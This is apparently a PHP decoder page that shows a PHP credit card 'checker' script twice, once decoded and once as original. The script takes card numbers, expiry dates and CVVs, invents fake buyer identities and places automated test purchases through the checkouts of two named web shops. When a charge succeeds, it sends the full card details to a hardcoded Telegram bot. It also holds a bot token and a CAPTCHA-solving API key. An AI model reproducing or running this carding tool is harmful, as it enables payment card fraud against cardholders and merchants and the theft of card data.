Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php set_time_limit(0); error_reporting(0); list($cc, $mm, $yyyy, $cvv) = explode("|",..

Decoded Output download

<?php 
set_time_limit(0); 
error_reporting(0); 
list($cc, $mm, $yyyy, $cvv) = explode("|", preg_replace('/[^0-9|]+/', '', $_GET['lista'])); 
$lista = "$cc|$mm|$yyyy|$cvv"; $m = substr($mm, 1); $yy = substr($yyyy, 2); $lastfour = substr($cc, 12,16); 
$cc1 = substr($cc, 0,4).'+'.substr($cc, 4,4).'+'.substr($cc, 8,4).'+'.substr($cc, 12,4); 
$path = 'raizen-cookie'; 
$randname = array_merge(range('a', 'z'), range('A', 'Z')); 
$shuffle = shuffle($randname); 
$name = substr(implode($randname), 0, 10); 
$cookie = $name.'.txt'; 
if (is_dir($path) === false) { 
  mkdir($path); 
} 
 function GenerateUID(int $variant=1){ 
    $charid = strtolower(md5(uniqid(rand(), true))); 
    $hyphen = chr(45); 
    if($variant > 0){ 
        $uuid = substr($charid, 0, 8).$hyphen.substr($charid, 8, 4).$hyphen.substr($charid,12, 4).$hyphen.substr($charid,16, 4).$hyphen.substr($charid,20,12); 
        return $uuid; 
    }else{ 
        $uuid = substr($charid, 0, 8).substr($charid, 8, 4).substr($charid,12, 4).substr($charid,16, 4).substr($charid,20,12); 
        return $uuid; 
    } 
    } 
$session_id = GenerateUID(1); 
 
//   $au_script1 = 'rizecutie'.rand().'.txt'; 
// file_put_contents($au_script1, "const AzCaptcha = require('azcaptcha'); 
 
// (async () => { 
//   const captcha = new AzCaptcha('siapcql7cwzskdvm3buw4t26gvxbehrk') 
//   try { 
//     if (await captcha.isBalanceGreaterThan(2)) { 
//       const taskId = await captcha.createTaskv2('6LeJI_0hAAAAAKA_4bxY8j448ejT6eKKXSWs9Hqx', 'https://www.puratap.com.au/checkout/') 
//       // console.log(taskId); 
//       //=> '402049' 
//       const result = await captcha.pollTaskResult(taskId); 
//       console.log(result); 
//     } 
//   } catch (err) { 
//     console.log(err); 
//     //=> 'INVALID SITE KEY etc ...' 
//   } 
// })(); 
// "); 
//   $captcha_response = trim(shell_exec('node '.$au_script1)); 
//   unlink($au_script1); 
//////////////////////// 
 
  $au_script = 'rizecutie'.random().'.txt'; 
file_put_contents($au_script, "const randomUseragent = require('random-useragent'); 
console.log(randomUseragent.getRandom(function (ua) { 
  return parseFloat(ua.browserVersion) >= 20; 
})); 
"); 
  $user_agent = trim(shell_exec('node '.$au_script)); 
  unlink($au_script); 
$retry = 0; 
retry: 
$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us'); 
preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1); 
$street = $matches1[1][0]; 
preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1); 
$city = $matches1[1][0]; 
preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1); 
$state = $matches1[1][0]; 
preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1); 
$phone = $matches1[1][0]; 
preg_match_all('/"postcode":(\d+)/', $get, $matches1); 
$postcode = $matches1[1][0]; 
if (empty($street)) { 
$retry++; 
goto retry; 
} 
$name = fname(); 
$last = lname(); 
$dmail = $name.$last.rand(111111,999999).''.array('@gmail.com','@hotmail.com','@outlook.com','@hotmail.co.uk')[rand(0,3)].''; 
 
$bin = substr($cc, 0, 1); 
if ($bin==4) { 
$typez= "001"; 
$typezz = "Visa"; 
$typezzz = "VISA"; 
} 
elseif ($bin==5) { 
$typez = "002"; 
$typezz = "MasterCard"; 
$typezzz = "Master Card"; 
} 
elseif ($bin==6) { 
$typez = "DC"; 
$typezz = "Discover"; 
$typezzz = "Discover"; 
}   
$phone = rand(11111111111,88818888888); 
$zipcode = rand(10,99); 
 
$raizen = curl_init();  
    curl_setopt_array($raizen,  
    [ 
      CURLOPT_URL => 'https://bluecordfirearms.com/product/gift-certificates/', 
      CURLOPT_POST => 1, 
      CURLOPT_FOLLOWLOCATION => 1, 
      CURLOPT_HEADER => 0, 
      CURLOPT_RETURNTRANSFER => 1, 
      CURLOPT_USERAGENT => $user_agent, 
            CURLOPT_POSTFIELDS => http_build_query([ 
    'attribute_value' => '$50', 
    'quantity' => 1, 
    'add-to-cart' => 6611, 
    'product_id' => 6611, 
    'variation_id' => 6617 
      ]), 
      CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie, 
      CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie, 
      CURLOPT_HTTPHEADER => hdr(' 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 
Accept-Language: en-AU,en;q=0.9 
        ' 
     ) 
    ] 
  ); 
$response = curl_exec($raizen); 
curl_close($raizen); 
 
$raizen = curl_init();  
    curl_setopt_array($raizen,  
    [ 
      CURLOPT_URL => 'https://bluecordfirearms.com/checkout/', 
      CURLOPT_HTTPGET => 1, 
      CURLOPT_FOLLOWLOCATION => 1, 
      CURLOPT_HEADER => 0, 
      CURLOPT_RETURNTRANSFER => 1, 
      CURLOPT_USERAGENT => $user_agent, 
      CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie, 
      CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie, 
      CURLOPT_HTTPHEADER => hdr(' 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 
Accept-Language: en-AU,en;q=0.9 
        ' 
     ) 
    ] 
  ); 
$response = curl_exec($raizen); 
curl_close($raizen); 
$nonce = r($response, '<input type="hidden" id="woocommerce-process-checkout-nonce" name="woocommerce-process-checkout-nonce" value="','"'); 
$context = r($response, '"capture_context":"','"'); 
$cyber_session = r($response, '"wc_cybersource_credit_card_device_data_session_id" value="','"'); 
$mercode = r($response, '"merchant_code":"','"'); 
$cliid = r($response, '"client_id":"','"'); 
$sucurenonce = r($response, 'name="fgc_securepay_nonce" value="','">'); 
 
$raizen = curl_init();  
    curl_setopt_array($raizen,  
    [ 
      CURLOPT_URL => 'https://www.puratap.com.au/?wc-ajax=checkout', 
      CURLOPT_POST => 1, 
      CURLOPT_FOLLOWLOCATION => 1, 
      CURLOPT_HEADER => 0, 
      CURLOPT_RETURNTRANSFER => 1, 
      CURLOPT_USERAGENT => $user_agent, 
      CURLOPT_POSTFIELDS => http_build_query([ 
    'billing_first_name' => $name, 
    'billing_last_name' => $dmail, 
    'billing_company' => $last, 
    'billing_country' => 'US', 
    'billing_address_1' => 'DA', 
    'billing_address_2' => '26517 DANTI CT', 
    'billing_city' => 'HAYWARD', 
    'billing_state' => 'CA', 
    'billing_postcode' => '94545-3917', 
    'billing_phone' => $phone, 
    'billing_email' => $dmail, 
    'shipping_first_name' => '', 
    'shipping_last_name' => '', 
    'shipping_company' => '', 
    'shipping_country' => 'US', 
    'shipping_address_1' => '26517 Danti Court', 
    'shipping_address_2' => '', 
    'shipping_city' => 'Hayward', 
    'shipping_state' => 'CA', 
    'shipping_postcode' => '94545', 
    'shipping_phone' => '', 
    'shipping_method[0]' => 'flat_rate:4', 
    'payment_method' => 'securepay', 
    'securePayToken' => $tokval, 
    'securePay3DSSecure' => '', 
    'securePayOrderId' => '', 
    'payment_currency' => 'AUD', 
    'dccQuote' => '', 
    'card_scheme' => 'visa', 
    '_securepay_security' => 'no', 
    'fgc_securepay_nonce' => $sucurenonce, 
    'terms' => 'on', 
    'terms-field' => '1', 
    'g-recaptcha-response' => $captcha_response, 
    'woocommerce-process-checkout-nonce' => $nonce, 
    '_wp_http_referer' => '/?wc-ajax=update_order_review' 
      ]), 
    CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie, 
    CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie, 
      CURLOPT_HTTPHEADER => hdr(' 
Accept: application/json, text/javascript, */*; q=0.01 
Accept-Language: en-AU,en;q=0.9 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 
x-requested-with: XMLHttpRequest 
        ' 
     ) 
    ] 
  ); 
echo $response = curl_exec($raizen); 
curl_close($raizen); 
// $msg = r($response, '
			Status code: ','		<\/li>
			'); 
$msg = strip_tags(json_decode($response,1)['messages']); 
 
 
if(strpos($response, 'success')){ 
  file_get_contents('https://api.telegram.org/bot5587870434:AAFdGjo4wudptj_DQYT72jRBjeWSffnqzY8/sendMessage?chat_id=5117560499&text='.$lista.'|Charged  '); 
echo '#LIVE '.$lista.' => '.$response.''; 
} 
// elseif (empty($msg)) { 
// $retry++; 
// goto retry; 
// } 
// elseif(strpos($wc, 'Please wait while your request is being verified')) { 
//     $retry++; 
//   goto retry; 
     
// } 
elseif(strpos($response, 'messages')){ 
echo 'LIVE '.$lista.' => '.$msg.' [Retries: '.$retry.'])'; 
} 
elseif($decision == 'ERROR') { 
echo 'LIVE '.$lista.' => '.$msg.' [Retries: '.$retry.'])'; 
} 
else { 
echo '#Declined '.$lista.' => '.$response.''; 
 
 
} 
 
function r($a, $b, $c){ 
  return explode($c, explode($b, $a)[1])[0]; 
} 
 
 
function random($length = 10){ 
  $str = ''; 
  $_s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwyxz0123456789'; 
  $strlen = strlen($_s); 
  for($x = $length; $x != 0; $x--){ 
    $str .= $_s[mt_rand(1, $strlen)-1]; 
  } 
  return $str; 
} 
 
function hdr($s) { 
  foreach (explode("
", $s) as $key => $value) { 
    $h[$key] = ltrim($value, " "); 
  } return $h; 
} 
 
function fname($z1=5){$u2='';$x3=array("a","e","i","o","u");$c4=array('b','c','d','f','g','h','j','k','l','m','n','p','r','s','t','v','w','x','y','z');$f5=$z1/2;for($y6=1;$y6<=$f5;$y6++){$u2.=$c4[rand(0,19)];$u2.=$x3[rand(0,4)];}return $u2;} 
 
function lname($z1=7){$u2='';$x3=array("a","e","i","o","u");$c4=array('b','c','d','f','g','h','j','k','l','m','n','p','r','s','t','v','w','x','y','z');$f5=$z1/2;for($y6=1;$y6<=$f5;$y6++){$u2.=$c4[rand(0,19)];$u2.=$x3[rand(0,4)];}return $u2;} 
 
 
unlink('raizen-cookie/'.$cookie.''); 
ob_flush(); 
die(); 
?>

Did this file decode correctly?

Original Code

<?php
set_time_limit(0);
error_reporting(0);
list($cc, $mm, $yyyy, $cvv) = explode("|", preg_replace('/[^0-9|]+/', '', $_GET['lista']));
$lista = "$cc|$mm|$yyyy|$cvv"; $m = substr($mm, 1); $yy = substr($yyyy, 2); $lastfour = substr($cc, 12,16);
$cc1 = substr($cc, 0,4).'+'.substr($cc, 4,4).'+'.substr($cc, 8,4).'+'.substr($cc, 12,4);
$path = 'raizen-cookie';
$randname = array_merge(range('a', 'z'), range('A', 'Z'));
$shuffle = shuffle($randname);
$name = substr(implode($randname), 0, 10);
$cookie = $name.'.txt';
if (is_dir($path) === false) {
  mkdir($path);
}
 function GenerateUID(int $variant=1){
    $charid = strtolower(md5(uniqid(rand(), true)));
    $hyphen = chr(45);
    if($variant > 0){
        $uuid = substr($charid, 0, 8).$hyphen.substr($charid, 8, 4).$hyphen.substr($charid,12, 4).$hyphen.substr($charid,16, 4).$hyphen.substr($charid,20,12);
        return $uuid;
    }else{
        $uuid = substr($charid, 0, 8).substr($charid, 8, 4).substr($charid,12, 4).substr($charid,16, 4).substr($charid,20,12);
        return $uuid;
    }
    }
$session_id = GenerateUID(1);

//   $au_script1 = 'rizecutie'.rand().'.txt';
// file_put_contents($au_script1, "const AzCaptcha = require('azcaptcha');

// (async () => {
//   const captcha = new AzCaptcha('siapcql7cwzskdvm3buw4t26gvxbehrk')
//   try {
//     if (await captcha.isBalanceGreaterThan(2)) {
//       const taskId = await captcha.createTaskv2('6LeJI_0hAAAAAKA_4bxY8j448ejT6eKKXSWs9Hqx', 'https://www.puratap.com.au/checkout/')
//       // console.log(taskId);
//       //=> '402049'
//       const result = await captcha.pollTaskResult(taskId);
//       console.log(result);
//     }
//   } catch (err) {
//     console.log(err);
//     //=> 'INVALID SITE KEY etc ...'
//   }
// })();
// ");
//   $captcha_response = trim(shell_exec('node '.$au_script1));
//   unlink($au_script1);
////////////////////////

  $au_script = 'rizecutie'.random().'.txt';
file_put_contents($au_script, "const randomUseragent = require('random-useragent');
console.log(randomUseragent.getRandom(function (ua) {
  return parseFloat(ua.browserVersion) >= 20;
}));
");
  $user_agent = trim(shell_exec('node '.$au_script));
  unlink($au_script);
$retry = 0;
retry:
$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us');
preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
$street = $matches1[1][0];
preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
$city = $matches1[1][0];
preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
$state = $matches1[1][0];
preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
$phone = $matches1[1][0];
preg_match_all('/"postcode":(\d+)/', $get, $matches1);
$postcode = $matches1[1][0];
if (empty($street)) {
$retry++;
goto retry;
}
$name = fname();
$last = lname();
$dmail = $name.$last.rand(111111,999999).''.array('@gmail.com','@hotmail.com','@outlook.com','@hotmail.co.uk')[rand(0,3)].'';

$bin = substr($cc, 0, 1);
if ($bin==4) {
$typez= "001";
$typezz = "Visa";
$typezzz = "VISA";
}
elseif ($bin==5) {
$typez = "002";
$typezz = "MasterCard";
$typezzz = "Master Card";
}
elseif ($bin==6) {
$typez = "DC";
$typezz = "Discover";
$typezzz = "Discover";
}  
$phone = rand(11111111111,88818888888);
$zipcode = rand(10,99);

$raizen = curl_init(); 
    curl_setopt_array($raizen, 
    [
      CURLOPT_URL => 'https://bluecordfirearms.com/product/gift-certificates/',
      CURLOPT_POST => 1,
      CURLOPT_FOLLOWLOCATION => 1,
      CURLOPT_HEADER => 0,
      CURLOPT_RETURNTRANSFER => 1,
      CURLOPT_USERAGENT => $user_agent,
            CURLOPT_POSTFIELDS => http_build_query([
    'attribute_value' => '$50',
    'quantity' => 1,
    'add-to-cart' => 6611,
    'product_id' => 6611,
    'variation_id' => 6617
      ]),
      CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie,
      CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie,
      CURLOPT_HTTPHEADER => hdr('
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-AU,en;q=0.9
        '
     )
    ]
  );
$response = curl_exec($raizen);
curl_close($raizen);

$raizen = curl_init(); 
    curl_setopt_array($raizen, 
    [
      CURLOPT_URL => 'https://bluecordfirearms.com/checkout/',
      CURLOPT_HTTPGET => 1,
      CURLOPT_FOLLOWLOCATION => 1,
      CURLOPT_HEADER => 0,
      CURLOPT_RETURNTRANSFER => 1,
      CURLOPT_USERAGENT => $user_agent,
      CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie,
      CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie,
      CURLOPT_HTTPHEADER => hdr('
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-AU,en;q=0.9
        '
     )
    ]
  );
$response = curl_exec($raizen);
curl_close($raizen);
$nonce = r($response, '<input type="hidden" id="woocommerce-process-checkout-nonce" name="woocommerce-process-checkout-nonce" value="','"');
$context = r($response, '"capture_context":"','"');
$cyber_session = r($response, '"wc_cybersource_credit_card_device_data_session_id" value="','"');
$mercode = r($response, '"merchant_code":"','"');
$cliid = r($response, '"client_id":"','"');
$sucurenonce = r($response, 'name="fgc_securepay_nonce" value="','">');

$raizen = curl_init(); 
    curl_setopt_array($raizen, 
    [
      CURLOPT_URL => 'https://www.puratap.com.au/?wc-ajax=checkout',
      CURLOPT_POST => 1,
      CURLOPT_FOLLOWLOCATION => 1,
      CURLOPT_HEADER => 0,
      CURLOPT_RETURNTRANSFER => 1,
      CURLOPT_USERAGENT => $user_agent,
      CURLOPT_POSTFIELDS => http_build_query([
    'billing_first_name' => $name,
    'billing_last_name' => $dmail,
    'billing_company' => $last,
    'billing_country' => 'US',
    'billing_address_1' => 'DA',
    'billing_address_2' => '26517 DANTI CT',
    'billing_city' => 'HAYWARD',
    'billing_state' => 'CA',
    'billing_postcode' => '94545-3917',
    'billing_phone' => $phone,
    'billing_email' => $dmail,
    'shipping_first_name' => '',
    'shipping_last_name' => '',
    'shipping_company' => '',
    'shipping_country' => 'US',
    'shipping_address_1' => '26517 Danti Court',
    'shipping_address_2' => '',
    'shipping_city' => 'Hayward',
    'shipping_state' => 'CA',
    'shipping_postcode' => '94545',
    'shipping_phone' => '',
    'shipping_method[0]' => 'flat_rate:4',
    'payment_method' => 'securepay',
    'securePayToken' => $tokval,
    'securePay3DSSecure' => '',
    'securePayOrderId' => '',
    'payment_currency' => 'AUD',
    'dccQuote' => '',
    'card_scheme' => 'visa',
    '_securepay_security' => 'no',
    'fgc_securepay_nonce' => $sucurenonce,
    'terms' => 'on',
    'terms-field' => '1',
    'g-recaptcha-response' => $captcha_response,
    'woocommerce-process-checkout-nonce' => $nonce,
    '_wp_http_referer' => '/?wc-ajax=update_order_review'
      ]),
    CURLOPT_COOKIEFILE => getcwd().'/'.$path.'/'.$cookie,
    CURLOPT_COOKIEJAR => getcwd().'/'.$path.'/'.$cookie,
      CURLOPT_HTTPHEADER => hdr('
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-AU,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
x-requested-with: XMLHttpRequest
        '
     )
    ]
  );
echo $response = curl_exec($raizen);
curl_close($raizen);
// $msg = r($response, '\n\t\t\tStatus code: ','\t\t<\/li>\n\t\t\t');
$msg = strip_tags(json_decode($response,1)['messages']);


if(strpos($response, 'success')){
  file_get_contents('https://api.telegram.org/bot5587870434:AAFdGjo4wudptj_DQYT72jRBjeWSffnqzY8/sendMessage?chat_id=5117560499&text='.$lista.'|Charged  ');
echo '#LIVE '.$lista.' => '.$response.'';
}
// elseif (empty($msg)) {
// $retry++;
// goto retry;
// }
// elseif(strpos($wc, 'Please wait while your request is being verified')) {
//     $retry++;
//   goto retry;
    
// }
elseif(strpos($response, 'messages')){
echo 'LIVE '.$lista.' => '.$msg.' [Retries: '.$retry.'])';
}
elseif($decision == 'ERROR') {
echo 'LIVE '.$lista.' => '.$msg.' [Retries: '.$retry.'])';
}
else {
echo '#Declined '.$lista.' => '.$response.'';


}

function r($a, $b, $c){
  return explode($c, explode($b, $a)[1])[0];
}


function random($length = 10){
  $str = '';
  $_s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwyxz0123456789';
  $strlen = strlen($_s);
  for($x = $length; $x != 0; $x--){
    $str .= $_s[mt_rand(1, $strlen)-1];
  }
  return $str;
}

function hdr($s) {
  foreach (explode("\r\n", $s) as $key => $value) {
    $h[$key] = ltrim($value, " ");
  } return $h;
}

function fname($z1=5){$u2='';$x3=array("a","e","i","o","u");$c4=array('b','c','d','f','g','h','j','k','l','m','n','p','r','s','t','v','w','x','y','z');$f5=$z1/2;for($y6=1;$y6<=$f5;$y6++){$u2.=$c4[rand(0,19)];$u2.=$x3[rand(0,4)];}return $u2;}

function lname($z1=7){$u2='';$x3=array("a","e","i","o","u");$c4=array('b','c','d','f','g','h','j','k','l','m','n','p','r','s','t','v','w','x','y','z');$f5=$z1/2;for($y6=1;$y6<=$f5;$y6++){$u2.=$c4[rand(0,19)];$u2.=$x3[rand(0,4)];}return $u2;}


unlink('raizen-cookie/'.$cookie.'');
ob_flush();
die();
?>

Function Calls

None

Variables

None

Stats

MD5 7b440c0766d5dcefbcf857c9b06ac02e
Eval Count 0
Decode Time 65 ms